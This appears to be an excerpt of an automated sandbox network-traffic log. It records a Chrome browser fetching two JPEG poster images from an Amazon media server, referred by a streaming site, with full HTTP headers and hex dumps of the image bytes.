                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: e3 cb 6c ab ae be 07 e7 cb 18 ed 2f 6f dd 38 21 bb 8a 60 13 44 45 b3 53 db 0d b2 bc 62 ff 00 b4 d0 aa 04 50 00 9e c5 12 dc e5 41 01 9c a5 99 68 9f af e6 6b de 80 c8 e5 fb a5 32 cc 6a 9a 59 e3 06 f6 bf 51 96 05 20 c2 b0 d6 44 ee 29 ef 72 ac 95 02 7d dd 46 f2 67 f0 52 d6 d8 c3 96 49 05 c2 41 0a 82 3b b7 15 1a 1f 12 80 ec 1f 1c 47 71 ea 75 3f c5 ac b9 61 c8 b3 fb 17 34 e7 f8 67 2d 88 18 11 18 4d 4a c0 89 8e 0f ed 78 75 ff 00 6d c2 9a da c8 d9 5b 62 4a f9 07 02 37 92 68 d9 ce 67 dd 78 d9 b6 18 2d 61 d9 36 93 08 dc 29 a9 ae 84 15 cd 6a 70 9c 35 36 c3 f0 65 58 b0 79 0b c4 b7 c8 5a cb c5 ea fe 7b 2d ea eb b3 5a c2 ab 3d 60 c0 a0 4e a1 80 42 fb 33 62 7b 40 fd 7b d6 51 9d ec 1b 3c d6 73 59 c9 4c d2 cc 9c a1 cc 81 86 a6 c1 0d c6 1c a5 10 e6 24 fb a9 3e fa cf f6 0b
                                                                                                                                                                                          Data Ascii: l/o8!`DESbPAhk2jYQ D)r}FgRIA;Gqu?a4g-MJxum[bJ7hgx-a6)jp56eXyZ{-Z=`NB3b{@{Q<sYL$>
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 1a 0b ee 06 04 46 84 42 08 f6 17 71 cf d8 c0 60 b3 52 bc 8d 79 14 e5 f3 00 3e b8 fa 56 dc b1 23 55 b8 d8 fa f3 0a 4b e9 3d df 1d 85 ae bf 2d ad 9d 06 9c b7 09 83 61 74 56 a3 1d be c6 07 9c a5 04 13 a9 5a f8 10 7d 97 50 6d 4c 3e 61 5d 42 23 d2 0c 7a 81 79 6e d9 c6 9e b3 cc c1 53 13 a9 5e 1d 71 7a 72 89 75 41 00 03 97 f8 df b1 84 40 f2 ab 78 b0 32 9b 03 01 a5 85 37 0c 23 70 89 61 d2 93 08 f0 4c 14 ff 00 61 a0 ec 19 f1 01 95 e2 85 95 e2 6c 6e 64 29 ee 1d 9d 0f 4f fb 19 a8 cb a1 11 c8 33 18 9f 04 57 92 c3 da d8 18 6c 32 cd 42 b2 d4 da ea 1a e1 58 6a 8b 54 5c 61 02 00 93 2e d1 cd b5 b8 ff 00 b1 fc 15 81 66 35 c0 68 1a 91 5d 04 5a 38 c6 59 af c3 2e e3 d3 0d 53 b3 13 1b 5e 66 95 7d e6 75 25 aa b2 03 dd cb cc dc 61 e4 98 60 31 44 45 f3 a1 8e ba 03 6b 60 d4 68 61
                                                                                                                                                                                          Data Ascii: FBq`Ry>V#UK=-atVZ}PmL>a]B#zynS^qzruA@x27#paLalnd)O3Wl2BXjT\a.f5h]Z8Y.S^f}u%a`1DEk`ha
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 37 2c a8 6a 5b fe 9c a3 1d c8 8c 51 67 f9 21 99 d9 34 23 bc 93 ad 4a 19 d7 28 36 29 43 a9 30 d6 0a 74 17 2d 31 d8 85 9e 30 0c 6f b2 a8 44 93 0a d1 40 dd 7e c4 ce 49 f6 72 4c 9a 29 21 30 1d a6 c9 a9 e6 bc 29 1d ca 2c e8 8a 07 05 02 4c bc 91 f2 45 c9 b3 8f 93 af 93 1e 4e 9f e1 93 f5 1b 96 3e 8c d6 c9 7a 00 b0 79 98 8b be b1 ff 00 00 1e 91 f8 f4 69 35 e8 f4 ff 00 c6 4f a3 d7 d1 6b fe 66 7d 76 ff 00 3c 3e 87 da 3d 16 9e 8d 33 f8 f4 6a 45 51 5f dc 08 7a 04 f9 a1 01 e6 7e e6 b6 7d 29 98 62 ba 72 a4 7c d1 77 88 b3 fb 27 bd 09 17 17 62 f7 7d 1d 6b aa a8 3c c4 e8 08 16 b4 f9 59 a9 dd 18 21 bf f2 8f 5b 93 43 e5 75 a3 50 a5 d6 1f a3 e1 1b f5 94 d6 11 f2 db 0d 42 19 42 f6 79 4e c1 f2 b7 41 3f ad 4b 9d 85 3f 17 a7 70 43 08 a2 ed 89 a1 8a 33 9b bc 47 96 b5 9a cf b4 75
                                                                                                                                                                                          Data Ascii: 7,j[Qg!4#J(6)C0t-10oD@~IrL)!0),LEN>zyi5Okf}v<>=3jEQ_z~})br|w'b}k<Y![CuPBByNA?K?pC3Gu
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 78 77 af 1e dc 6f d1 48 09 e9 a1 c5 66 68 b5 92 cd 35 58 30 3c 71 31 91 9d c8 f2 fc 54 c2 80 0c cd 57 bc f8 da 0e a8 68 7d af c4 a7 63 44 68 ed 3e 1e 23 84 2b 57 65 ef 1e 77 e8 fd 74 59 cd d9 e3 df 9f fc 1e 8c 7e 85 91 95 86 6b ef 18 62 41 07 5d 40 48 d9 69 a2 8c 92 e2 15 4e a1 1e 0e 5f c4 bb 14 4b 81 38 1a 8f 58 49 60 ae d5 19 cd a2 71 04 15 2b 6b a1 b1 c0 6c 8b f5 87 d2 8a 15 96 b3 c7 e3 3d 5d 87 5a d9 2c f5 20 d5 26 d1 54 ab 97 eb e7 e8 65 00 39 b2 34 7d 6a 78 5f 7f eb a2 de 88 de 84 7a ca 54 b3 c1 06 39 b3 ed 3b 4f b4 e5 3d a7 21 ed 3b cf 69 da 7d a2 5f 6d 0d 64 ba cf 11 ac 85 ee b2 eb ac cd b3 2d cd da dc 57 3a 71 34 9e 4c d1 81 b1 fe c7 68 11 67 b6 73 8c e6 67 f8 fa 4e 95 34 94 97 f5 bb f4 7a 30 22 54 d6 af 15 67 49 b5 ad 2b 56 63 32 0e 0a c2 37 d9
                                                                                                                                                                                          Data Ascii: xwoHfh5X0<q1TWh}cDh>#+WewtY~kbA]@HiN_K8XI`q+kl=]Z, &Te94}jx_zT9;O=!;i}_md-W:q4LhgsgN4z0"TgI+Vc27
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 51 25 75 29 2c 86 89 86 53 17 d3 72 0c 19 12 cf e6 02 b8 63 1b 74 46 61 86 53 2a f2 4a e8 ed a6 9e 8e b2 a2 74 21 3d 04 26 ce b3 6f 07 47 ad 74 1d 06 cf b6 cc da 43 a9 ca 6a cc 03 a3 ac da 98 1b ea cf 59 8b 49 5f e1 00 e3 46 31 7d 32 d4 a1 2f d2 5d 0e 95 2a 09 14 30 6a f1 e6 54 0e 85 f4 f5 66 87 83 a5 74 61 d0 e8 95 b4 e1 85 9e 13 46 3a e4 77 e8 ab e8 20 cb 32 42 1d 04 31 0a ed 49 9d 4c 93 12 47 98 32 c0 c4 a8 13 48 95 95 ce bc 32 c3 3b 74 95 a6 68 e7 a3 41 e0 84 a9 51 25 43 ac bf 59 aa 8a c3 ac 56 d4 c5 98 76 32 b3 d6 a3 06 64 65 19 9c d2 99 e1 61 08 e1 dc 06 9f 68 2c b2 01 06 d2 ce 97 34 1e 0f a2 be 83 a9 c9 0d c3 08 b8 be cd e3 59 50 23 2b a9 d3 08 21 82 5b 2b 2e 21 76 2c a6 55 63 bc c6 5d 8b 0f 44 bc 75 b8 ae 5c 7a 0d 0f 07 d2 9d 07 ab 08 b1 34 ca db
                                                                                                                                                                                          Data Ascii: Q%u),SrctFaS*Jt!=&oGtCjYI_F1}2/]*0jTftaF:w 2B1ILG2H2;thAQ%CYVv2deah,4YP#+![+.!v,Uc]Du\z4


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          145192.168.2.1649888151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:18 UTC676OUTGET /images/M/MV5BMzFkM2YwOTQtYzk2Mi00N2VlLWE3NTItN2YwNDg1YmY0ZDNmXkEyXkFqcGdeQXVyMTMxODk2OTU@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:18 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 41692
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: e1dd3066-6455-4076-8605-f86e2c3e754a
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Sun, 22 Oct 2017 23:09:35 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Sat, 05 Sep 2043 11:55:23 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:18 GMT
                                                                                                                                                                                          Age: 2917369
                                                                                                                                                                                          X-Served-By: cache-iad-kjyo7100047-IAD, cache-ewr-kewr1740065-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 be 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 01 05 01 01 01 01 00 00 00 00 00 00 00 00 00 04 03 05 06 07 08 02 01 00 09 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b1 85 38 7d 9c 21 bb 55 59 aa 3d 93 f4
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"58}!UY=
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: b5 1f 58 fb e5 9c d8 de e4 83 62 75 51 d9 6c d1 9f 6d b0 a0 5f 9e f4 c1 41 27 a3 f3 32 57 3a d2 cb 2a 48 c7 de a2 94 b3 85 31 77 56 b4 62 5c ff 00 03 b0 ac 24 a2 6f 8d b4 2c 56 31 32 8c 94 f0 37 30 be 34 ca cb ac ab 0d 7f 29 b0 97 c6 12 76 72 f5 5f 98 e0 5e 9d a1 3a c0 df a2 85 04 77 c2 c2 65 43 0d 08 ca 4a 78 2b 7a 60 c5 9c 61 b1 25 36 36 37 a2 9f 41 66 ba 17 a9 4f 43 f4 e3 39 96 c7 f6 2d 01 7e 23 aa f4 d3 2e 68 4d d8 8c b1 ad 8a c5 9f 46 e5 0e 92 ac 31 a2 d8 8b 4f 42 27 11 e5 86 61 09 30 0b 5a 22 ab 93 a7 76 79 29 bd 93 41 57 da ba 4c ec de 25 7e eb 77 d1 02 38 42 be 35 14 06 fe 8b 7e 73 fe 8c b8 83 23 7b 80 2f e5 94 60 85 d6 51 c1 fb d7 06 aa ee 86 b0 a9 fb a7 cf fa 99 35 97 40 4a 0a ad d7 c3 15 2c 70 57 24 d5 f6 98 99 b4 cc 48 4c bd 28 f4 76 c3 a9 e5
                                                                                                                                                                                          Data Ascii: XbuQlm_A'2W:*H1wVb\$o,V12704)vr_^:weCJx+z`a%667AfOC9-~#.hMF1OB'a0Z"vy)AWL%~w8B5~s#{/`Q5@J,pW$HL(v
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: ca 7d 4d 51 69 92 46 88 9b ef a3 14 36 d5 57 d1 aa 7e 52 f9 f0 8a 34 fd 74 87 11 54 f9 76 c3 20 91 b9 83 87 84 40 0e 1f 05 22 dd 22 d7 22 a9 18 44 98 44 ee b8 cf ee 02 09 e0 d3 94 43 a6 86 0c e2 eb 16 89 23 2d 6b a9 f9 1e 42 eb 21 86 ae f9 c4 f4 3a 15 73 40 e2 f1 1e 6e b6 4a 33 57 75 6b 2b 61 d3 a0 9e 3c f3 54 92 38 f3 22 24 22 f9 a3 4b 4f 20 9a 9e 9d 04 8c db 79 62 c1 d1 28 c3 85 22 ee 64 32 f7 3d 33 61 01 9a 2c 71 75 09 b7 5e d2 98 51 af 71 6b 4b ca 91 c2 87 b1 da 20 4c 13 3a 0d 2a a7 be 1d 98 55 60 8c 16 72 0c 39 78 b4 ad 58 7b 55 85 64 11 50 4e 7a 2c a6 98 a4 4e 2d 64 be 8d 22 a5 73 bb 45 d9 42 73 4d 2f 6b 23 68 2f 85 93 1b 9f 4c a1 62 d8 13 c8 57 08 58 7d 28 97 13 4e 07 76 02 45 d7 8b 73 dc 2b 49 ff 00 11 27 27 20 f8 06 b9 48 7a b7 5b c1 bd ee 44 9f
                                                                                                                                                                                          Data Ascii: }MQiF6W~R4tTv @"""DDC#-kB!:s@nJ3Wuk+a<T8"$"KO yb("d2=3a,qu^QqkK L:*U`r9xX{UdPNz,N-d"sEBsM/k#h/LbWX}(NvEs+I'' Hz[D
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 56 dc 4e 95 4e 15 67 50 bb 06 68 69 ce 20 5c 4d b9 62 26 b6 ad e1 66 8c 65 de 6b 53 7e d8 46 1a 6a a9 dc a8 62 ac ae 6c c7 20 ae 65 eb b9 55 e6 62 f2 25 e3 e6 68 c9 7d d5 45 a6 cb 43 ed d3 d2 ca 13 75 c3 72 60 ee da 3d c1 c6 38 d7 7c 4b 7c fe d6 f1 29 c6 5e 14 6b 78 95 d0 8a 73 35 fa db 56 e1 5d 5a 8a 35 45 b0 00 de 70 da da 4f 7b 64 af 15 8c 0d 71 cb 89 a3 5e 0f a0 1e e3 2c 5d cb 28 1b 2d 96 8c 89 7d 7e 25 9c d4 b1 b8 60 62 98 58 a4 df ce 27 de 4a c6 10 9c 73 19 b2 98 95 37 68 ef 8a 56 cc 32 a2 63 98 0f b8 82 eb 96 45 6a ed 1e f1 2e b3 7b a8 16 f9 83 d0 c3 1b c4 a5 06 5f 22 d5 27 da 0e 66 a9 bf f5 19 96 e6 d1 c7 67 b0 e0 9d 17 f3 5b 5e 75 07 05 25 eb 96 9a 4f b7 d0 40 3c 88 fc 15 31 fc 4b 3c 34 4e 6b 59 6a f0 27 83 3c 88 e7 1c 42 d2 d1 96 68 eb 14 f1 1c
                                                                                                                                                                                          Data Ascii: VNNgPhi \Mb&fekS~Fjbl eUb%h}ECur`=8|K|)^kxs5V]Z5EpO{dq^,](-}~%`bX'Js7hV2cEj.{_"'fg[^u%O@<1K<4NkYj'<Bh
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: b0 12 af ba e9 66 a1 75 6c cd 75 8d b5 15 4a f7 16 ab 76 62 0e 61 95 7d eb 2d f3 e8 62 f8 5f 47 f1 35 7f dd 6c e9 d6 ef 12 af fb ae 53 ec 65 e9 fa c1 67 31 f5 00 4d 67 53 ec f8 fa 93 66 5e 74 fb 0d bb f2 c3 db 17 c4 4f 13 a8 be dd b2 db bf 1f 5d 5a 9c 4f ac ae 7d 52 19 be 57 e5 63 f8 9a 3f 36 89 af 1e e1 3a 88 f6 c7 fc 44 ba c4 75 b1 f5 17 5d af fe 66 ef 25 99 ee d6 70 b6 a4 e7 c1 11 e5 5f 7a 4b 7c fa 18 be 17 d1 fc 4d 5f f7 5b 34 97 f6 5a 55 ad ce 23 ea 4b 0c 4a 05 75 f9 d6 39 2c 71 69 df 85 53 63 5a cc f6 74 d1 b4 9c 3f 89 f1 12 75 55 e3 32 ed 4f b6 01 12 ac c3 5c ac 95 3c 69 c6 5c 2c b4 71 34 5f 7d 93 a9 f8 9a f6 f6 09 7b 78 8d fc 74 f1 42 77 43 47 d6 1b b3 b9 af 6b dc 3b 6a 8f bc b0 8d 2a fb d6 5b e7 d0 c5 f0 be 8d 35 7f dd 6f a2 b9 58 9a f7 1e 53 55
                                                                                                                                                                                          Data Ascii: fuluJvba}-b_G5lSeg1MgSf^tO]ZO}RWc?6:Du]f%p_zK|M_[4ZU#KJu9,qiScZt?uU2O\<i\,q4_}{xtBwCGk;j*[5oXSU
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: e9 ba 60 57 36 e9 2a 34 17 a6 28 e3 8c 96 8b e6 7d bc cb 1f f0 89 bb 99 8c 71 0b 62 66 33 0f 8c e4 c3 92 63 e7 3f b0 98 47 cc f1 e0 18 5b 9e 4f 39 84 e2 1e 07 19 9b a1 e7 10 9e 40 8e 7d 17 cc 6f c4 c4 6e 39 85 7e 61 1f 31 bd c3 31 bc cf 1c 80 7f da 66 7c e2 34 a6 1f 6c b2 29 e2 13 98 dc 98 79 22 36 26 df 99 e0 c0 66 00 22 1f 83 07 e6 1f f8 31 e6 63 e6 5d 45 9a 7c 16 09 61 5e e4 aa a3 71 3b 39 48 d5 95 f2 5b 6c ed b1 52 f2 ba 9e de 11 06 48 c7 2b e7 18 19 18 03 ca 21 3b a5 88 6a 25 5d 81 5c 64 2e 0c 03 26 1e 23 7b 7c ed dc 0c 6e 7c 29 c2 c3 cc 61 f1 39 f1 17 06 62 79 31 a6 ec 43 f8 98 87 cc 5f ff 00 6f 9c 4d f9 80 ed 1c e7 77 8d 4e a9 af c6 f1 ac 74 a8 e9 e6 93 56 da 72 48 6b 4b 3e e7 d6 6b ed d5 ed ee 13 06 a4 f6 4d 33 47 af 7d 26 ed ba 04 b2 eb d3 b7 d4
                                                                                                                                                                                          Data Ascii: `W6*4(}qbf3c?G[O9@}on9~a11f|4l)y"6&f"1c]E|a^q;9H[lRH+!;j%]\d.&#{|n|)a9by1C_oMwNtVrHkK>kM3G}&
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 06 bd e2 f5 07 c6 0f d5 3e ed e7 eb ec 9f 5f 60 ce 6e d6 59 62 e0 d1 7b e9 ce e4 4e a2 d3 f5 33 35 1a c6 bf 13 a7 64 50 4c ee 15 22 75 95 da 29 04 0f 89 b3 10 b1 98 8e 26 dc f1 1f 5b bd 51 1a bd 6e d5 64 43 9f 2c 7d be 87 e6 79 9b 27 22 31 f4 0b 0f 91 07 cc 00 f0 26 7e 49 f3 99 ff 00 66 20 83 d3 cc db 89 e2 55 b4 11 bb 7d 23 33 b9 51 9b e9 f3 34 9d 42 bd 38 2b 3f 57 a5 66 bf 58 9a 9d bb 61 f8 1e 87 99 bb 31 57 22 1f 42 be 27 fd 9b 63 41 3c 67 d4 09 e7 88 79 e4 fa 67 e6 66 73 82 66 dc 66 78 10 41 f8 99 c4 5f cc 3f f6 79 e6 0c 8f 74 fb a7 0d 33 cc 26 13 f1 1b 83 0c ff c4 00 2d 11 00 02 02 01 03 03 04 02 01 03 05 00 00 00 00 00 01 02 00 11 03 04 12 21 05 13 31 10 22 32 41 14 15 06 16 20 51 23 24 33 42 61 ff da 00 08 01 02 01 01 08 00 13 78 85 e5 cb f5 bf 4b
                                                                                                                                                                                          Data Ascii: >_`nYb{N35dPL"u)&[QndC,}y'"1&~If U}#3Q4B8+?WfXa1W"B'cA<gygfsffxA_?yt3&-!1"2A Q#$3BaxK
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 9d 4a b1 99 30 3e f3 b1 b5 c9 87 3e 1d 3b 60 ea ca e3 50 ed 9b f9 22 63 45 c8 f8 ba 80 ca 40 c5 b8 d9 2c 47 37 01 20 58 70 19 25 80 61 23 80 3e 3c 41 77 cf dd 4e a3 a2 cb 9b 0e 34 c5 8b a2 e7 c5 d4 9b 58 a7 f8 f6 a5 df 2b 43 d2 b5 05 42 1e 9e ce 98 76 64 4e d2 02 13 a8 69 35 59 f2 36 a3 08 e9 fa a6 d3 eb 70 0c ba 0d 46 56 d1 e4 99 3a 16 af 06 56 5c 58 30 b2 62 44 27 18 b0 20 20 d0 8a 6d 39 aa e2 1a 3c 4b 07 c8 f0 48 ae 6e 21 15 c8 a8 73 01 01 07 98 d9 01 9b 97 c4 ee a8 e2 07 58 18 79 87 2a 79 2c d5 ca f3 7b a6 d0 3c 23 5d a9 21 ae 0b 32 b9 a9 b4 f2 21 c4 3e c4 13 60 fa 26 87 a5 4a f1 07 f8 13 60 34 61 40 00 9b 1b c1 38 b8 a8 a7 c4 c8 a0 c1 42 59 00 5a b5 1f 40 b1 9e 8d 04 b2 2e 33 7d 4d e2 a0 60 66 e1 0b 0f a0 dc 9b 15 70 bd 73 03 5c 0e cd 01 dd cc 39 37
                                                                                                                                                                                          Data Ascii: J0>>;`P"cE@,G7 Xp%a#><AwN4X+CBvdNi5Y6pFV:V\X0bD' m9<KHn!sXy*y,{<#]!2!>`&J`4a@8BYZ@.3}M`fps\97
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 40 15 7b c1 06 2a 79 72 19 56 da 35 0b a9 cb 09 72 84 96 1e 0b 7b 11 27 36 ea 26 12 65 91 4e 71 35 bb c8 bc 18 a4 6c e2 d6 71 24 83 70 82 3a 65 f6 cc 64 04 71 7d d2 e2 bb 8b b1 25 c5 a4 b6 53 18 27 e9 9d 10 5e 4e 5a 45 2a 14 42 9b 76 5c 17 c0 20 15 12 ec e1 d5 19 41 cb bd c2 ac 24 a2 f5 09 a7 65 14 dd 56 75 8c 09 2c fa 89 82 d4 65 3a a2 21 3a 47 7d dc 88 a3 98 23 54 11 24 1c ec 23 05 42 80 3b e4 02 69 26 2d 25 5c 4d 95 ab ff 00 a6 fe 46 25 09 d2 ec 45 a5 8a 02 f0 85 c9 7d 95 94 2d 07 92 1f 0a 8a cd dc 10 17 48 ce ad 70 93 5b 92 6b e5 dc 01 8b 8e aa d3 00 94 fd 49 ad a3 8b 4f 99 42 40 23 ea 08 55 7c 27 b9 33 08 d1 2d 2d 11 3f b7 08 8e 14 ca 9b b4 62 9d 82 44 11 4c 1b 60 d1 b5 e3 05 6e 91 e3 08 d2 c8 c5 5d 69 03 ab ac 95 c6 c3 61 72 8b 8c 9b 84 79 33 42 e3
                                                                                                                                                                                          Data Ascii: @{*yrV5r{'6&eNq5lq$p:edq}%S'^NZE*Bv\ A$eVu,e:!:G}#T$#B;i&-%\MF%E}-Hp[kIOB@#U|'3--?bDL`n]iary3B
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: ad e8 a7 3f 2f ad 50 b5 99 25 3e f0 89 c1 2f 82 a2 77 97 78 a0 b7 46 3d d8 72 4e 6d 33 b9 ad e9 fa ad e8 e1 ba 26 b2 de 53 46 20 d4 90 a9 ed 7d aa be ff 00 1b b9 21 c0 14 6d 08 28 0d 14 00 b9 f7 3a b2 b4 c4 51 ef b9 f1 50 0d e8 84 be 53 51 30 81 c4 aa 6c d0 19 b2 c2 ae d4 97 1e 88 43 0b 39 b4 58 53 dd 11 19 67 78 18 93 75 15 a3 1e 8c b4 aa d4 01 fe da b0 f9 a8 08 8c 45 71 97 f7 65 9a ac 31 c5 ab f3 2c 35 8a 89 07 b1 98 9a cb 53 4e 18 24 7a d5 6f 1c fe 3f 8e 2f 5d 98 a5 29 1b b9 60 a0 6c 01 71 68 17 ec ff 00 4d 51 b0 d9 fa f2 94 91 00 90 6b 20 7e 4a 40 80 78 84 0f 45 e0 53 11 c4 c0 5f 14 fa f5 41 88 8e 29 27 3f 34 19 b5 94 0b da 3b f9 5d 90 77 59 5c bd 14 3c fe 5f c8 78 e2 f5 d9 2d e8 8b 43 08 95 a8 a4 3f a6 b5 4c 09 7a 39 8b 45 88 7f 27 9a 86 cc 11 d2 27
                                                                                                                                                                                          Data Ascii: ?/P%>/wxF=rNm3&SF }!m(:QPSQ0lC9XSgxuEqe1,5SN$zo?/])`lqhMQk ~J@xES_A)'?4;]wY\<_x-C?Lz9E''


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          146192.168.2.1649889151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:18 UTC684OUTGET /images/M/MV5BNzQzOTk3OTAtNDQ0Zi00ZTVkLWI0MTEtMDllZjNkYzNjNTc4L2ltYWdlXkEyXkFqcGdeQXVyNjU0OTQ0OTY@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:18 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 42594
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 6e038806-401d-470b-a43b-706aacd43a90
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Thu, 14 Jul 2016 21:40:00 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Thu, 26 Nov 2043 02:35:53 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 3454826
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:18 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kjyo7100094-IAD, cache-ewr-kewr1740065-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 c3 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 05 06 04 07 00 02 03 08 01 09 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 02 03 01 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 40 23 1c 8f 77 84 33 97 6e 2f 39 f2 7a 46
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"4@#w3n/9zF
